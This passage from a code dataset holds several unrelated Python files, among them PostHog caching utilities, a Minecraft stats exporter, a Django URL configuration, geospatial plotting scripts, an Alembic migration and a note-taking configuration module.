'__main__':\n\n # default configure file name\n filename = './conf/conf.json'\n # default finance analysis\n trade_flag = False \n # tradeflag = True \n try:\n opts, args = getopt.getopt(sys.argv[1:], \"f:p:t:\", [\"filename=\", \"path=\", \"tradeflag=\"])\n except getopt.GetoptError:\n print('test.py -o ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('python3 finance_stock_basic_proc.py -f conf.json')\n elif opt in (\"-f\", \"--filename\"):\n filename = arg\n elif opt in (\"-t\", \"--tradeflag\"):\n trade_flag = True \n\n conf = common_func.read_config(filename)\n\n daily_trade_process(conf)\n\n","repo_name":"luozero/finance_quant","sub_path":"factors_calc.py","file_name":"factors_calc.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"39510430799","text":"from datetime import datetime, timedelta\nfrom math import ceil\nfrom time import sleep\nfrom typing import Optional, Tuple, Union\nimport zoneinfo\nfrom rest_framework import request\n\nfrom posthog.caching.calculate_results import (\n CLICKHOUSE_MAX_EXECUTION_TIME,\n calculate_cache_key,\n)\nfrom posthog.caching.insight_caching_state import InsightCachingState\nfrom posthog.models import DashboardTile, Insight\nfrom posthog.models.filters.utils import get_filter\nfrom posthog.utils import refresh_requested_by_client\n\n\"\"\"\nUtilities used by the insights API to determine whether\nor not to refresh an insight upon a client request to do so\n\"\"\"\n\n# Default minimum wait time for refreshing an insight\nBASE_MINIMUM_INSIGHT_REFRESH_INTERVAL = timedelta(minutes=15)\n# Wait time for short-term insights\nREDUCED_MINIMUM_INSIGHT_REFRESH_INTERVAL = timedelta(minutes=3)\n# Wait time for insights on shared insight/dashboard pages\nINCREASED_MINIMUM_INSIGHT_REFRESH_INTERVAL = timedelta(minutes=30)\n\n\ndef should_refresh_insight(\n insight: Insight,\n dashboard_tile: Optional[DashboardTile],\n *,\n request: request.Request,\n is_shared=False,\n) -> Tuple[bool, timedelta]:\n \"\"\"Return whether the insight should be refreshed now, and what's the minimum wait time between refreshes.\n\n If a refresh already is being processed somewhere else, this function will wait for that to finish (or time out).\n \"\"\"\n filter = get_filter(\n data=insight.dashboard_filters(dashboard_tile.dashboard if dashboard_tile is not None else None),\n team=insight.team,\n )\n\n delta_days: Optional[int] = None\n if filter.date_from and filter.date_to:\n delta = filter.date_to - filter.date_from\n delta_days = ceil(delta.total_seconds() / timedelta(days=1).total_seconds())\n\n refresh_frequency = BASE_MINIMUM_INSIGHT_REFRESH_INTERVAL\n if is_shared:\n # The interval is longer for shared insights/dashboards\n refresh_frequency = INCREASED_MINIMUM_INSIGHT_REFRESH_INTERVAL\n elif getattr(filter, \"interval\", None) == \"hour\" or (delta_days is not None and delta_days <= 7):\n # The interval is shorter for short-term insights\n refresh_frequency = REDUCED_MINIMUM_INSIGHT_REFRESH_INTERVAL\n\n refresh_insight_now = False\n if refresh_requested_by_client(request):\n now = datetime.now(tz=zoneinfo.ZoneInfo(\"UTC\"))\n target: Union[Insight, DashboardTile] = insight if dashboard_tile is None else dashboard_tile\n cache_key = calculate_cache_key(target)\n # Most recently queued caching state\n caching_state = (\n InsightCachingState.objects.filter(team_id=insight.team.pk, cache_key=cache_key, insight=insight)\n .order_by(\"-last_refresh_queued_at\")\n .first()\n )\n refresh_insight_now = (\n caching_state is None\n or caching_state.last_refresh is None\n or (caching_state.last_refresh + refresh_frequency <= now)\n )\n\n if refresh_insight_now:\n has_refreshed_somewhere_else = _sleep_if_refresh_is_running_somewhere_else(caching_state, now)\n if has_refreshed_somewhere_else:\n refresh_insight_now = False\n\n return refresh_insight_now, refresh_frequency\n\n\ndef _sleep_if_refresh_is_running_somewhere_else(caching_state: Optional[InsightCachingState], now: datetime) -> bool:\n \"\"\"Prevent the same query from running concurrently needlessly.\"\"\"\n is_refresh_currently_running = _is_refresh_currently_running_somewhere_else(caching_state, now)\n if is_refresh_currently_running:\n assert caching_state is not None # Isn't None due to condition in _is_refresh_currently_running_somewhere_else\n while is_refresh_currently_running:\n sleep(1)\n caching_state.refresh_from_db()\n has_refresh_completed = (\n caching_state.last_refresh is not None\n and caching_state.last_refresh >= caching_state.last_refresh_queued_at\n )\n if has_refresh_completed:\n return True # Refresh has completed while being intitiated from somewhere else!\n is_refresh_currently_running = _is_refresh_currently_running_somewhere_else(\n caching_state, datetime.now(tz=zoneinfo.ZoneInfo(\"UTC\"))\n )\n return False\n\n\ndef _is_refresh_currently_running_somewhere_else(caching_state: Optional[InsightCachingState], now: datetime) -> bool:\n \"\"\"Return whether the refresh is most likely still running somewhere else.\"\"\"\n if (\n caching_state is not None\n # A refresh must have been queued at some point in the past\n and caching_state.last_refresh_queued_at is not None\n # That point was recent enough that the query might still be running\n and caching_state.last_refresh_queued_at > now - timedelta(seconds=CLICKHOUSE_MAX_EXECUTION_TIME)\n # And refreshing must have either never finished or last finished before it was queued now\n and (caching_state.last_refresh is None or caching_state.last_refresh < caching_state.last_refresh_queued_at)\n ):\n return True\n else:\n # Otherwise we're sure the refresh isn't running at the moment - either it's not been queued or it's timed out\n # (barring the occasional race condition related to fetching state from PG, but that much uncertainty is okay)\n return False\n","repo_name":"PostHog/posthog","sub_path":"posthog/caching/insights_api.py","file_name":"insights_api.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"24350443593","text":"import logging\nimport os\n\nfrom main import CACHE_DIR, EXPORT_INTERVAL_SECONDS\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_player_count(server):\n try:\n server_status = server.status()\n return server_status.players.online\n except Exception as e:\n logger.exception(e)\n return 0\n\n\ndef get_online_players(server):\n try:\n return server.query().players.names\n except Exception as e:\n logger.exception(e)\n return []\n\n\ndef get_server_latency(server):\n try:\n server_status = server.status()\n return server_status.latency\n except Exception as e:\n logger.exception(e)\n return 0\n\n\ndef create_player_file(player_name):\n player_file_path = CACHE_DIR + player_name\n\n logger.info(\"File \" + player_file_path + \" does not exists, creating now\")\n\n f = open(player_file_path, \"a\")\n f.write(str(0))\n f.close()\n\n\ndef read_player_minutes(player_name):\n player_file_path = CACHE_DIR + player_name\n\n f = open(player_file_path, \"r\")\n player_minutes = f.read()\n f.close()\n\n return player_minutes\n\n\ndef add_player_minutes(player_name):\n player_file_path = CACHE_DIR + player_name\n\n if not os.path.isfile(player_file_path):\n create_player_file(player_name)\n\n player_minutes = read_player_minutes(player_name)\n\n logger.info(\"player minutes: \" + player_minutes)\n logger.info(\"Adding \" + str(EXPORT_INTERVAL_SECONDS / 60) + \" minute(s) to playertime to \" + player_name)\n\n f = open(CACHE_DIR + player_name, \"w\")\n f.write(str(float(player_minutes) + EXPORT_INTERVAL_SECONDS / 60))\n f.close()\n","repo_name":"kaiffeetasse/minecraft-exporter","sub_path":"minecraft_service.py","file_name":"minecraft_service.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13054899461","text":"\"\"\"housesauna URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\n\nfrom rest_framework import routers\n\nfrom api.views import RealtyApiView, StructuresApiView\nfrom . import views\n\nhandler404 = views.handler404\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n path('saunaman/', admin.site.urls),\n path('', views.IndexView.as_view(), name='index'),\n path('', include(router.urls)),\n path(\n 'api/v1/structures/',\n StructuresApiView.as_view(),\n name='get_structures'\n ),\n path(\n 'api/v1/realty/',\n RealtyApiView.as_view(),\n name='get_realty'\n ),\n path('not-found/', views.notfound, name='notfound'),\n path('about/', views.about, name='about'),\n path('design/', views.design, name='design'),\n path('policy/', views.policy, name='policy'),\n path('production/', views.production, name='production'),\n path(\n 'projects/',\n include(('houses.urls', 'houses'), namespace='houses')\n ),\n path('submit/', views.submit_form, name='submit'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n","repo_name":"letulip/housesauna","sub_path":"housesauna/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1672689052","text":"import matplotlib.pyplot as plt\nimport psycopg2\n\n\ndef polygon_to_points(polygon_string):\n xs = []\n ys = []\n points = polygon_string[9:-2].split(',')\n for point in points:\n (x, y) = point.split()\n xs.append(float(x))\n ys.append(float(y))\n return xs, ys\n\n\ndef point_to_points(point_string):\n xs = []\n ys = []\n points = point_string[6:-1].split(',')\n for point in points:\n (x, y) = point.split()\n xs.append(float(x))\n ys.append(float(y))\n return xs, ys\n\n\ndef linestring_to_points(line_string):\n xs = []\n ys = []\n points = line_string[11:-2].split(',')\n for point in points:\n (x, y) = point.split()\n xs.append(float(x))\n ys.append(float(y))\n return xs, ys\n\n\nscale = 1/30000\nconn = psycopg2.connect(\"dbname='trab' user='arcaic' host='localhost' password='password'\")\ncursor_psql = conn.cursor()\n\nsql = \"select st_astext(st_envelope(st_collect(st_simplify(proj_boundary, 100, FALSE)))) from cont_aad_caop2018 where concelho='PORTO'\"\ncursor_psql.execute(sql)\nresults = cursor_psql.fetchall()\nrow = results[0]\npolygon_string = row[0]\nxs, ys = polygon_to_points(polygon_string)\nwidth_in_inches = ((max(xs)-min(xs))/0.0254)*1.1\nheight_in_inches = ((max(ys)-min(ys))/0.0254)*1.1\nfig = plt.figure(figsize=(width_in_inches*scale,height_in_inches*scale))\n\n\nsql = \"select st_astext(st_simplify(proj_boundary,10,False)) from cont_aad_caop2018 where concelho in ('PORTO');\"\ncursor_psql.execute(sql)\nresults = cursor_psql.fetchall()\nfor row in results:\n polygon_string = row[0]\n xs, ys = polygon_to_points(polygon_string)\n plt.plot(xs,ys, color='black')\n\nxs = []\nys = []\n\nsql = \"select name, count(tracks.id), st_astext(proj_location) from tracks , taxi_stands where st_dwithin(proj_location, st_startpoint(proj_track), 50) group by name, proj_location;\"\ncursor_psql.execute(sql)\nresults = cursor_psql.fetchall()\nval = []\nfor row in results:\n val.append(row[1])\n point_string = row[2]\n x, y = point_to_points(point_string)\n xs.append(float(x[0]))\n ys.append(float(y[0]))\nplt.scatter(xs, ys, s=val, c=val, cmap='jet')\nplt.colorbar()\n\nplt.title('Tracks initiated in taxi stands ', fontdict={'fontsize': 22})\n\nplt.show()","repo_name":"jpsmonteiro98/Faculdade","sub_path":"TABD/Stands.py","file_name":"Stands.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39512736129","text":"import json\nfrom typing import TYPE_CHECKING, Optional\n\nfrom django.core.cache import cache\nfrom sentry_sdk import capture_exception\n\nif TYPE_CHECKING:\n from posthog.models.team import Team\n\nFIVE_DAYS = 60 * 60 * 24 * 5 # 5 days in seconds\n\n\ndef set_team_in_cache(token: str, team: Optional[\"Team\"] = None) -> None:\n from posthog.api.team import CachingTeamSerializer\n from posthog.models.team import Team\n\n if not team:\n try:\n team = Team.objects.get(api_token=token)\n except (Team.DoesNotExist, Team.MultipleObjectsReturned):\n cache.delete(f\"team_token:{token}\")\n return\n\n serialized_team = CachingTeamSerializer(team).data\n\n cache.set(f\"team_token:{token}\", json.dumps(serialized_team), FIVE_DAYS)\n\n\ndef get_team_in_cache(token: str) -> Optional[\"Team\"]:\n from posthog.models.team import Team\n\n try:\n team_data = cache.get(f\"team_token:{token}\")\n except Exception:\n # redis is unavailable\n return None\n\n if team_data:\n try:\n parsed_data = json.loads(team_data)\n return Team(**parsed_data)\n except Exception as e:\n capture_exception(e)\n return None\n\n return None\n","repo_name":"PostHog/posthog","sub_path":"posthog/models/team/team_caching.py","file_name":"team_caching.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"3259256385","text":"\"\"\"\nArgument management module.\n\"\"\"\n\nimport logging\n\nfrom colorlog import ColoredFormatter\n\nfrom . import __version__\n\n\nlog = logging.getLogger(__name__)\n\n\nclass InvalidArgument(Exception):\n \"\"\"\n Custom exception to raise when a command line argument or combination of\n arguments are invalid.\n \"\"\"\n\n\ndef validate_args(args):\n \"\"\"\n Validate that arguments are valid.\n\n :param args: An arguments namespace.\n :type args: :py:class:`argparse.Namespace`\n\n :return: The validated namespace.\n :rtype: :py:class:`argparse.Namespace`\n \"\"\"\n\n logfrmt = (\n ' {thin_white}{asctime}{reset} | '\n '{log_color}{levelname:8}{reset} | '\n '{message}'\n )\n\n verbosity_levels = {\n 0: logging.ERROR,\n 1: logging.WARNING,\n 2: logging.INFO,\n 3: logging.DEBUG,\n }\n\n stream = logging.StreamHandler()\n stream.setFormatter(ColoredFormatter(fmt=logfrmt, style='{'))\n\n level = verbosity_levels.get(args.verbosity, logging.DEBUG)\n logging.basicConfig(handlers=[stream], level=level)\n\n log.debug('Raw arguments:\\n{}'.format(args))\n\n return args\n\n\ndef parse_args(argv=None):\n \"\"\"\n Argument parsing routine.\n\n :param list argv: A list of argument strings.\n\n :return: A parsed and verified arguments namespace.\n :rtype: :py:class:`argparse.Namespace`\n \"\"\"\n from argparse import ArgumentParser\n\n parser = ArgumentParser(\n description='Python GTK Kiosk'\n )\n parser.add_argument(\n '-v', '--verbose',\n help='increase verbosity level',\n default=0,\n action='count',\n dest='verbosity',\n )\n parser.add_argument(\n '--version',\n action='version',\n version='{} {}'.format(parser.description, __version__)\n )\n parser.add_argument(\n '-k', '--kiosk',\n help='Enable kiosk mode',\n action='store_true',\n )\n\n args = parser.parse_args(argv)\n args = validate_args(args)\n return args\n\n\n__all__ = [\n 'parse_args',\n]\n","repo_name":"kuralabs/python-gtk-kiosk","sub_path":"python_gtk_kiosk/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32316910872","text":"from modules.automatic.myWebDriver import MyWebDriver\nfrom tkinter import *\nfrom tkinter import ttk\nimport sys\n\nclass MyGui:\n def __init__(self, version, currentDir, downloadDir=None):\n self.__currentDir = currentDir\n self.__downloadDir = downloadDir\n self.__version = version\n\n # 引数メソッド名をコールバックとして呼び出す\n def handler(self, funcName):\n objMyWebDriver = MyWebDriver(0, self.__currentDir, self.__downloadDir)\n eval('objMyWebDriver.' + funcName)()\n objMyWebDriver.quit()\n\n def getShipmentInfo(self):\n self.handler(sys._getframe().f_code.co_name)\n\n def setShipmentNo(self):\n self.handler(sys._getframe().f_code.co_name)\n\n def run(self):\n # Tkオブジェクト生成\n root = Tk()\n # タイトル\n root.title(\"RPA ver:\" + self.__version)\n # 画面の大きさの決定\n root.geometry(\"300x200+0+0\")\n # ウィジェットの作成\n #frame1 = ttk.Frame(root)\n Static1 = ttk.Label(\n #frame1, \n text='実行したいRPA処理をクリックして下さい')\n button1 = ttk.Button(\n #frame1,\n text='出荷情報抽出', \n command=self.getShipmentInfo,\n width=20, \n padding=5)\n button2 = ttk.Button(\n #frame1,\n text='運送伝票番号登録', \n command=self.setShipmentNo,\n width=20, \n padding=5)\n\n # レイアウト\n #frame1.pack()\n Static1.pack(side = TOP, pady = (10, 0))\n button1.pack(side = TOP, pady = (10, 0))\n button2.pack(side = TOP, pady = 10)\n\n root.mainloop() #イベントループ","repo_name":"tk2112/mainsys_automatic","sub_path":"modules/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14517199709","text":"import numpy as np\nimport sklearn.learning_curve as curves\nfrom sklearn.cross_validation import ShuffleSplit\nfrom sklearn.metrics import precision_score, accuracy_score, recall_score, f1_score, roc_auc_score\nfrom sklearn.metrics import precision_recall_curve, roc_curve\nfrom sklearn.metrics import confusion_matrix\n\n\ndef standard_confusion_matrix(y_true, y_predict):\n [[tn, fp], [fn, tp]] = confusion_matrix(y_true, y_predict)\n return np.array([[tp, fp], [fn, tn]])\n\n\ndef profit_curve(cost_benefit_matrix, probabilities, y_true):\n thresholds = sorted(probabilities, reverse=True)\n profits = []\n for threshold in thresholds:\n y_predict = probabilities > threshold\n confusion_mat = standard_confusion_matrix(y_true, y_predict)\n profit = np.sum(confusion_mat * cost_benefit_matrix) / float(len(y_true))\n profits.append(profit)\n return thresholds, profits\n\n\ndef run_profit_curve(model, costbenefit, X_train, X_test, y_train, y_test):\n probabilities = model.predict_proba(X_test)[:, 1]\n thresholds, profits = profit_curve(costbenefit, probabilities, y_test)\n return thresholds, profits\n\n\ndef plot_profit_model(model, costbenefit, X_train, X_test, y_train, y_test):\n percentages = np.linspace(0, 100, len(y_test))\n thresholds, profits = run_profit_curve(model, costbenefit, X_train, X_test, y_train, y_test)\n plt.plot(percentages, profits, label=model.__class__.__name__)\n plt.title(\"Profit Curve\")\n plt.xlabel(\"Percentage of test instances (decreasing by score)\")\n plt.ylabel(\"Profit\")\n plt.legend(loc='best')\n plt.savefig('profit_curve.png')\n\n\ndef find_best_threshold(model, costbenefit, X_train, X_test, y_train, y_test):\n max_threshold = None\n max_profit = None\n\n thresholds, profits = run_profit_curve(model, costbenefit, X_train, X_test, y_train, y_test)\n max_index = np.argmax(profits)\n if profits[max_index] > max_profit:\n max_threshold = thresholds[max_index]\n max_profit = profits[max_index]\n return max_threshold, max_profit\n","repo_name":"pengmiao2014/Uber_Rider_Data","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72303784807","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 19 09:27:40 2021\n\n@author: akhilesh.koul\n\"\"\"\n\nimport geopandas as gpd\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(\"..\")\nimport seaborn as sns\nsns.set_theme()\nimport requests\nfrom shapely.geometry import Point\nfrom shapely.ops import cascaded_union\nfrom shapely.ops import unary_union\nfrom geovoronoi.plotting import plot_voronoi_polys_with_points_in_area\nfrom geovoronoi import voronoi_regions_from_coords, points_to_coords\nfrom data.db_description import getDatabase\n\n\n\n\nclass imvoronoit():\n \n def __init__(self,chain='MCD',notebook=True):\n \n \n \n region_db,chainDB=getDatabase()\n # print(region_db)\n self.regionDB=next(item for item in region_db if item['Name'] == 'MASTER_PLAN') \n \n attrDB=next(item_ for item_ in chainDB if item_['Name'] == chain)\n # print(attrDB)\n \n if notebook== False:\n \n self.shape_path='../'\n self.image_path='../'+attrDB['logoFile']\n \n if notebook== True:\n \n self.shape_path='' \n self.image_path=attrDB['logoFile']\n \n self.chain=chain \n self.getBoundary()\n self.getShape(chain)\n \n def getBoundary(self,plot=False): \n \n region = gpd.read_file(self.shape_path + self.regionDB['shapeFile'])\n polygons=[region.iloc[0][\"geometry\"],\n region.iloc[1][\"geometry\"],\n region.iloc[2][\"geometry\"],\n region.iloc[3][\"geometry\"],\n region.iloc[4][\"geometry\"]]\n\n union_poly = unary_union(polygons)\n self.boundary = gpd.GeoSeries(union_poly)\n self.boundary.crs=\"epsg:4326\"\n if plot==True:\n fig, ax = plt.subplots(figsize=(12, 8))\n self.boundary.plot(ax=ax,color='gray')\n ax.axis('off')\n plt.show()\n\n def getShape(self,chain):\n \n _,chainDB=getDatabase()\n attrDB=next(item for item in chainDB if item['Name'] == chain)\n self.chain_gdf = gpd.read_file(self.shape_path+attrDB['shapeFile'])\n\n\n\n def justDots(self):\n fig, ax = plt.subplots(figsize=(12, 8))\n self.boundary.plot(ax=ax,color='gray')\n self.chain_gdf.plot(ax=ax,markersize=3.5, color='black')\n ax.axis('off')\n plt.show()\n \n def drawVoronoi(self):\n self.boundary = self.boundary.to_crs(epsg=3395)\n gdf_proj = self.chain_gdf.to_crs(self.boundary.crs)\n\n boundary_shape = cascaded_union(self.boundary.geometry)\n coords = points_to_coords(gdf_proj.geometry)\n\n poly_shapes,pts = voronoi_regions_from_coords(coords, boundary_shape)\n # fig, ax = subplot_for_map()\n \n arr_image = plt.imread(self.image_path, format='png')\n fig, ax = plt.subplots(figsize=(7/4,1))\n ax.axis('off')\n ax.imshow(arr_image)\n plt.show()\n\n fig, ax = plt.subplots(figsize=(12,8))\n \n plot_voronoi_polys_with_points_in_area(ax, boundary_shape, poly_shapes, coords,pts,points_markersize=20)\n ax.set_title('Voronoi regions for '+str(self.chain) +' chain in Singapore',fontsize=15)\n plt.tight_layout()\n ax.axis('off')\n plt.show()\n \n \n \n def getNearby(self,address='Marina Bay Sands',distance=0.03):\n url='https://developers.onemap.sg/commonapi/search?searchVal='+str(address)+'&returnGeom=Y&getAddrDetails=Y&pageNum=1'\n jsondata=requests.get(url).json()\n \n if len(jsondata['results'])>0:\n print('Found '+str(len(jsondata['results']))+ ' results, using the first default one')\n print(str(jsondata['results'][0]['ADDRESS']))\n lat=float(jsondata['results'][0]['LATITUDE'])\n long=float(jsondata['results'][0]['LONGITUDE'])\n # print(long,lat)\n \n local=gpd.GeoDataFrame()\n geoser=gpd.GeoDataFrame([Point(long,lat)])\n local['geometry']=geoser[0]\n \n local_buffer=gpd.GeoDataFrame()\n local_buffer['geometry']=local.buffer(distance)\n local_buffer.crs=\"epsg:4326\"\n \n \n bool_list=[]\n for i in range(len(self.chain_gdf)):\n bool_list.append(local_buffer.contains(self.chain_gdf.iloc[i]['geometry']).item())\n \n nearbyDF=pd.DataFrame()\n if(any(ele for ele in bool_list)==True):\n \n chain_inlocal=[i for i, x in enumerate(bool_list) if x]\n print('\\n'+str(len(chain_inlocal))+' chain Found')\n for j in range(len(chain_inlocal)):\n nearbyDF=nearbyDF.append(self.chain_gdf.iloc[chain_inlocal[j]])\n \n # print(pd.DataFrame(self.chain_gdf.iloc[chain_inlocal[j]]))\n \n \n \n \n else:\n print(\"\\nNo chain found at the given address\")\n self.boundary = self.boundary.to_crs(epsg=3395)\n gdf_proj = self.chain_gdf.to_crs(self.boundary.crs)\n local_buffer_proj = local_buffer.to_crs(self.boundary.crs)\n\n boundary_shape = cascaded_union(self.boundary.geometry)\n coords = points_to_coords(gdf_proj.geometry)\n\n poly_shapes,pts = voronoi_regions_from_coords(coords, boundary_shape)\n # fig, ax = subplot_for_map()\n \n arr_image = plt.imread(self.image_path, format='png')\n fig, ax = plt.subplots(figsize=(7/4,1))\n ax.axis('off')\n ax.imshow(arr_image)\n plt.show()\n\n fig, ax = plt.subplots(figsize=(12,8))\n \n plot_voronoi_polys_with_points_in_area(ax, boundary_shape, poly_shapes, coords,pts,points_markersize=20)\n local_buffer_proj.plot(ax=ax,color='red',edgecolor='black',alpha=0.5)\n ax.set_title('Voronoi regions for '+str(self.chain) +' chain in Singapore, with location radius of 3kms',fontsize=15)\n plt.tight_layout()\n ax.axis('off')\n plt.show()\n \n nearbyDF.reset_index(drop=True,inplace=True)\n # print(nearbyDF.head()) \n return nearbyDF\n \n \n \n \n \n \n \nif __name__ == '__main__':\n imvoronoit_class=imvoronoit(chain='MUSEUMS',notebook=False)\n imvoronoit_class.getBoundary(plot=True)\n imvoronoit_class.justDots()\n imvoronoit_class.drawVoronoi()\n nearbyDF=imvoronoit_class.getNearby(address='Bukit Timah' , distance=0.03)\n # \n \n\n \n","repo_name":"koulakhilesh/imvoronoit","sub_path":"scripts/imvoronoit.py","file_name":"imvoronoit.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74251704486","text":"\"\"\"Base creation\n\nRevision ID: 6fb2120835e8\nRevises: \nCreate Date: 2022-09-09 22:56:26.218778\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6fb2120835e8'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('user_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('username', sa.String(), nullable=True),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('password', sa.String(length=255), nullable=True),\n sa.Column('active', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('user_id')\n )\n op.create_table('list',\n sa.Column('list_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('creator_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['creator_id'], ['user.user_id'], ),\n sa.PrimaryKeyConstraint('list_id')\n )\n op.create_table('card',\n sa.Column('card_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('title', sa.String(), nullable=False),\n sa.Column('content', sa.Text(), nullable=False),\n sa.Column('deadline', sa.DateTime(), nullable=False),\n sa.Column('completed_on', sa.DateTime(), nullable=True),\n sa.Column('complete', sa.Boolean(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.Column('creator_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['creator_id'], ['user.user_id'], ),\n sa.ForeignKeyConstraint(['parent_id'], ['list.list_id'], ),\n sa.PrimaryKeyConstraint('card_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('card')\n op.drop_table('list')\n op.drop_table('user')\n # ### end Alembic commands ###\n","repo_name":"antimatter96/mad1","sub_path":"project/migrations/versions/6fb2120835e8_.py","file_name":"6fb2120835e8_.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41396252673","text":"#! /usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\nimport time\nimport re\nimport urllib\nfrom bs4 import BeautifulSoup\n\n\ndef get_soup(url, sleep=1.0):\n time.sleep(sleep)\n headers = {\n 'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) \\\n AppleWebKit/537.36 (KHTML, like Gecko) \\\n Chrome/39.0.2171.95 Safari/537.36'\n }\n req = urllib.request.Request(url, headers=headers)\n with urllib.request.urlopen(req) as response:\n html = response.read()\n soup = BeautifulSoup(html, \"html5lib\")\n return soup\n\n\ndef main():\n query = '男性'\n\n page = 1\n query = urllib.parse.quote(query)\n\n # 無限ループは良くない\n while True:\n url = 'http://twpf.jp/search/profile\\\n?page={}&sort=modified&direction=desc\\\n&target=personal_tag&keyword={}'.format(page, query)\n soup = get_soup(url)\n results = soup.find_all('div', class_='profile clearfix')\n\n for result in results:\n user_id = re.match(r'@[^ ]+',\n result.find('div', class_='name').get_text())\n if user_id is not None:\n user_id = user_id.group(0)\n print(user_id)\n page += 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"daigo-kimura/profile-estimation-api","sub_path":"src/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5945883128","text":"#! /usr/bin/env python3\n\nfrom nts.argument_parse import collect\nimport toml\nimport os\nimport json\n\nclass Config:\n def __init__(self, args_file):\n self.args = os.path.dirname(__file__) + '/../' + args_file\n self.file_path = os.path.expanduser(collect.Arguments(self.args).value(\"config\"))\n self.journal = collect.Arguments(self.args).value(\"journal\")\n self.debug = collect.Arguments(self.args).value(\"debug\")\n self.action = collect.Arguments(self.args).value(\"action\")\n self.list = collect.Arguments(self.args).value(\"list\")\n try:\n self.storage_path = os.path.dirname(os.path.dirname(toml.load(self.file_path).get(self.journal).get(\"journal_path\")))\n except AttributeError:\n self.storage_path = os.path.expanduser(\"~/.local/share/nts\")\n self.notebody = collect.Arguments(self.args).value(\"notebody\")\n self.subject = collect.Arguments(self.args).value(\"subject\")\n try:\n self.default_subject = toml.load(self.file_path).get(self.journal).get(\"default_subject\")\n except AttributeError:\n self.default_subject = None\n try:\n self.time_format = toml.load(self.file_path).get(self.journal).get(\n \"time_format\", \"%m/%d/%Y, %H:%M:%S\")\n except AttributeError:\n self.time_format = \"%m/%d/%Y, %H:%M:%S\"\n\n\n def values(self):\n return toml.load(self.file_path)\n\n\ndef check_for_configuration(config):\n if os.path.isfile(config.file_path):\n return config.values()\n else:\n default_journal_path = \"{}/default/journal.json\".format(config.storage_path)\n default_toml = {\"default\": {\"journal_path\": \"{}\".format(default_journal_path)}}\n user_set_path = input(\"Set path for config: [{}] ?\".format(config.file_path))\n if not user_set_path:\n user_set_path = config.file_path\n try:\n os.makedirs(os.path.dirname(user_set_path))\n except FileExistsError:\n pass\n with open(user_set_path, \"w\") as config_file:\n config_file.write(toml.dumps(default_toml))\n print(\"Configuration created.\")\n return Config(\"arguments.yaml\").values()\n\ndef check_for_journal(journal):\n journal_path = journal.get(\"journal_path\", \"\")\n if os.path.isfile(journal_path):\n return True\n else:\n 